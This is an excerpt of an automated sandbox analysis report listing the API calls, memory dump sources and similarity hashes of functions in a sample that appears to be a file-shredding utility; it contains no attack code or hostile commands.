                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 8189fd10e7184cbb88187df1274c58d88710965d10f12092d1ae1b5a567f378b
                                • Instruction ID: 99a8e39cd8b9aa7089544bf455d837836a2432c743ae676dcecce1bc371dc6a5
                                • Opcode Fuzzy Hash: 8189fd10e7184cbb88187df1274c58d88710965d10f12092d1ae1b5a567f378b
                                • Instruction Fuzzy Hash: CE31FCF1D042649FEB649B14CC94BEEBB71AF81318F2400EAD41D97241C6789EC1CF56
                                Function 0041D4DA Relevance: 1.3, APIs: 1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 40abeb67ee043aea32e8690ca285f100373b4414e2d1248687a44cf818d667f1
                                • Instruction ID: 71719418a1b4fb13aa7b5aa533180aacdd603228149514a4ad730b87de8a9586
                                • Opcode Fuzzy Hash: 40abeb67ee043aea32e8690ca285f100373b4414e2d1248687a44cf818d667f1
                                • Instruction Fuzzy Hash: AF31BAB1E042289FEB649B04DC94BEABB35EF81314F2040EAD50D57240DA799EC2CF46
                                Function 0041D500 Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 5ce2823a7871b2acd5e3e1b2dc81427670d575952ac963192ea187050240a4fb
                                • Instruction ID: dac66cc95bc8b01d603d776b89c768c4ce343fb921c84495077b8fc2c16ab045
                                • Opcode Fuzzy Hash: 5ce2823a7871b2acd5e3e1b2dc81427670d575952ac963192ea187050240a4fb
                                • Instruction Fuzzy Hash: 68318CB5D452289FDB649F04CC50BEABB71AF85314F2040EAD40D57240CA399ED2CF46
                                Function 0041D10B Relevance: 1.3, APIs: 1, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 2d23705379fc4fb457e9e4454beea901acb2ecf30b8a6bed61fe92c9f92d011e
                                • Instruction ID: c8ee4a4fd1a5268f81d9b6f1173ded6ec42534c51f760a9137365c36237a247a
                                • Opcode Fuzzy Hash: 2d23705379fc4fb457e9e4454beea901acb2ecf30b8a6bed61fe92c9f92d011e
                                • Instruction Fuzzy Hash: B521FFF2D042249FE7649B08CC65BEABB34AF80314F1400F6E80D67240CA79AED1CF46
                                Function 0041CCCC Relevance: 1.3, APIs: 1, Instructions: 66memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3e1301a223ec8c480cd37c99b0d67b72b36870dea40e8f68b6058af4725b6416
                                • Instruction ID: b04d92052e1a9242fcd62b235eb6ce943607c460441f50c781c8d2ff644ed56f
                                • Opcode Fuzzy Hash: 3e1301a223ec8c480cd37c99b0d67b72b36870dea40e8f68b6058af4725b6416
                                • Instruction Fuzzy Hash: C721FDF2E442248FEB649A18CC54BEABB31AB81314F2040F6D40D57240DA789EC2CF46
                                Function 0041CCD3 Relevance: 1.3, APIs: 1, Instructions: 65memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3b4ae8e346aa4bffae6b03aeaf2bee0d1cebb9923c008a3c251d92ab6b1c5bd3
                                • Instruction ID: 628a473148a750b3b4515e2ac1f6f0476f85678b521c9c4d520b8b01f3e2013b
                                • Opcode Fuzzy Hash: 3b4ae8e346aa4bffae6b03aeaf2bee0d1cebb9923c008a3c251d92ab6b1c5bd3
                                • Instruction Fuzzy Hash: 2821FFB2E442248FEB649B18CC58BE9BB31AF81314F2040E6D40D57280CA789EC2CF46
                                Function 0041D550 Relevance: 1.3, APIs: 1, Instructions: 61memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: af9d9f517decce8a9a49804e3b39d00a2dc17a89163b4f6fa57c493975b4d132
                                • Instruction ID: 90fc563921f5a7bfe076efa3264523c28a58b333f6b94fd82723dedf2e7d7a6d
                                • Opcode Fuzzy Hash: af9d9f517decce8a9a49804e3b39d00a2dc17a89163b4f6fa57c493975b4d132
                                • Instruction Fuzzy Hash: E721CDB5E452248FEBA4DB04CC94BEABB75AF84314F2040E6D40D67240CA38AEC2CF46
                                Function 0041D582 Relevance: 1.3, APIs: 1, Instructions: 61memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e65aaa3730f4e9db59db954266a223db6bd455e4015ef3806ef208cbcd723a5f
                                • Instruction ID: bee3b69b0cb7532e6c2d321ee1b36428b0007147f78c261ae9762714a3971cfc
                                • Opcode Fuzzy Hash: e65aaa3730f4e9db59db954266a223db6bd455e4015ef3806ef208cbcd723a5f
                                • Instruction Fuzzy Hash: 9D21CDB5E452248FEBA4DB04CC94BEABB35AF84314F2040E6D40D67240CA38AEC1CF46
                                Function 0041D5A7 Relevance: 1.3, APIs: 1, Instructions: 61memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: f78831e2d74b0e7d3f9044bbc3116be7cd7328b2d3067d396d412a235c4471ba
                                • Instruction ID: 4f7f27649dc378bb65b3cc19e9d27b51a747d98201ddc6d9602885c63ad5a57f
                                • Opcode Fuzzy Hash: f78831e2d74b0e7d3f9044bbc3116be7cd7328b2d3067d396d412a235c4471ba
                                • Instruction Fuzzy Hash: 2521CDB5E452248FEBA4DB04CC94BEABB75AF84314F2040E6D40D67240CA38AEC1CF56

                                Non-executed Functions

                                Function 00448A60 Relevance: 127.0, APIs: 84, Instructions: 998filesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,000000FF,?,?), ref: 00448A88
                                • GetFileSize.KERNEL32(00000000,?), ref: 00448AA8
                                • _memset.LIBCMT ref: 00448B0B
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B42
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B5C
                                • WriteFile.KERNEL32(?,?,00010000,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448B82
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448BB1
                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448BCB
                                • WriteFile.KERNEL32(?,?,?,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448BF1
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000001), ref: 00448C0C
                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,?,?,?,00000000,00000001), ref: 00448C28
                                • CloseHandle.KERNEL32(00000000), ref: 00449641
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: File$ObjectSingleWait$CloseCreateHandleWrite$Size_memset
                                • String ID:
                                • API String ID: 1172678342-0
                                • Opcode ID: 8158509e58f484527f8a71e58faa1b2d8b70b3c493390f632461b5bab676af5f
                                • Instruction ID: 64ce1d2b17513850fb0e4411e5c373f0339fe494243065142823b194911eea1b
                                • Opcode Fuzzy Hash: 8158509e58f484527f8a71e58faa1b2d8b70b3c493390f632461b5bab676af5f
                                • Instruction Fuzzy Hash: 2F729F71A00302ABFF209F658C85F6F77A8AB44B14F24462AB911EB2D0DB79DD41D76C
                                Function 0043E2B0 Relevance: 75.6, APIs: 26, Strings: 17, Instructions: 311synchronizationwindowCOMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00008003), ref: 0043E2BC
                                • ImmDisableIME.IMM32(00000000), ref: 0043E2C4
                                • GetCommandLineW.KERNEL32(00000000), ref: 0043E2C9
                                  • Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E1B6
                                  • Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E1C9
                                  • Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E232
                                  • Part of subcall function 0043E180: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0043E247
                                  • Part of subcall function 0043E180: WTSQuerySessionInformationW.WTSAPI32(00000000,000000FF,00000004,?,?), ref: 0043E270
                                • CreateMutexW.KERNEL32(00000000,00000001,Local\Q360FileSmasher), ref: 0043E2F1
                                • GetLastError.KERNEL32 ref: 0043E2FD
                                • CloseHandle.KERNEL32(00000000), ref: 0043E30B
                                • StrStrIW.SHLWAPI(00000000,/shredfilelist="), ref: 0043E341
                                • StrStrIW.SHLWAPI(00000000,/settings), ref: 0043E35E
                                • FindWindowW.USER32(Q360FileSmasher,00000000), ref: 0043E385
                                • PostMessageW.USER32(00000000,0000062A,00000000,00000000), ref: 0043E395
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset$Error$CloseCommandCreateDisableFileFindHandleInformationLastLineMessageModeModuleMutexNamePostQuerySessionWindow
                                • String ID: "%s\%s"$%s%s" \elevated$/settings$/shredfilelist="$CrashReport.dll$FileSmasher$Initialize$Local\Q360FileSmasher$OnExiting$Q360FileSmasher$QHFileSmasher.exe$T9N$T9N$T9N$\elevated$j$k
                                • API String ID: 1902784322-2381632180
                                • Opcode ID: 59198087e51c1363d126bae50eb2ade3f94f94c331f8b47c28bae9ad9aa6ace2
                                • Instruction ID: 70a8ff0a3b9e5c91b017811f117eb0c60edb2bcc08bfe4f646206ccabeb3a458
                                • Opcode Fuzzy Hash: 59198087e51c1363d126bae50eb2ade3f94f94c331f8b47c28bae9ad9aa6ace2
                                • Instruction Fuzzy Hash: 47B1F375A002059BD700EBB6DC46FAE77A8EF48315F04426EF901E72E2DB789905CB6D
                                Function 004A0059 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ___getlocaleinfo
                                • String ID:
                                • API String ID: 1937885557-0
                                • Opcode ID: 7149db81927407c76787afe78904fe86b4b779e5014d3df2113b982d8224dec7
                                • Instruction ID: d78bb72a78f728332970ea5f5fe48e6d28cccd5370fe34feca858d2a329bf209
                                • Opcode Fuzzy Hash: 7149db81927407c76787afe78904fe86b4b779e5014d3df2113b982d8224dec7
                                • Instruction Fuzzy Hash: A4E1BCB290020DFEEF12DAE1CC85DFF7BFDEB44748F05092EB25592041EA75AA059B64
                                Function 00446220 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 518registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcmpiW.KERNEL32 ref: 004462B6
                                • lstrcmpiW.KERNEL32(?,ForceRemove), ref: 004462C5
                                • CharNextW.USER32(?), ref: 00446315
                                • lstrcmpiW.KERNEL32(?,?), ref: 00446336
                                • lstrlenW.KERNEL32(?), ref: 004463BE
                                • lstrcmpiW.KERNEL32(?,NoRemove), ref: 0044641C
                                • lstrcmpiW.KERNEL32(?,Val), ref: 0044644F
                                • RegDeleteValueW.ADVAPI32(?,?,?), ref: 0044652E
                                • RegCloseKey.ADVAPI32(?), ref: 00446546
                                • CharNextW.USER32(?), ref: 00446588
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 004465C6
                                • RegCloseKey.ADVAPI32(?), ref: 004465DD
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0044661D
                                • RegCloseKey.ADVAPI32(?), ref: 0044662C
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00446675
                                • RegCloseKey.ADVAPI32(?), ref: 0044668A
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00446718
                                • RegCloseKey.ADVAPI32(?), ref: 0044672F
                                • lstrlenW.KERNEL32(?,1D1D1D8C), ref: 0044679A
                                • RegCloseKey.ADVAPI32(?,1D1D1D8C), ref: 00446886
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004468D0
                                • RegCloseKey.ADVAPI32(?), ref: 00446997
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Close$lstrcmpi$Open$CharDeleteNextlstrlen$CreateValue
                                • String ID: Delete$ForceRemove$NoRemove$Val
                                • API String ID: 2903862752-1781481701
                                • Opcode ID: 537ced69c2cd842a418a76494a0b16460cd5d7ff513b27c580eaa63c3c2ddb9f
                                • Instruction ID: 38dacbaf035d53700198e9207873e49377624f0e13f7760dddca0bad48bb2fbe
                                • Opcode Fuzzy Hash: 537ced69c2cd842a418a76494a0b16460cd5d7ff513b27c580eaa63c3c2ddb9f
                                • Instruction Fuzzy Hash: 6B12B971D01239ABEF35AF55DC886AEB2B4AF45744F0101AFE405A7340D7788E85CF9A
                                Function 00412670 Relevance: 32.9, Strings: 26, Instructions: 365COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$L$L$P$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-1806678545
                                • Opcode ID: 0a6a548e8bdc20afd2ce68292e80a03c9196dcf4a7353b167b4aef734bcb2bdb
                                • Instruction ID: 2d2fd1696cb9a11b1d54eaca7a4e0fd4c7847b6d7041376ab4959040b79c7eec
                                • Opcode Fuzzy Hash: 0a6a548e8bdc20afd2ce68292e80a03c9196dcf4a7353b167b4aef734bcb2bdb
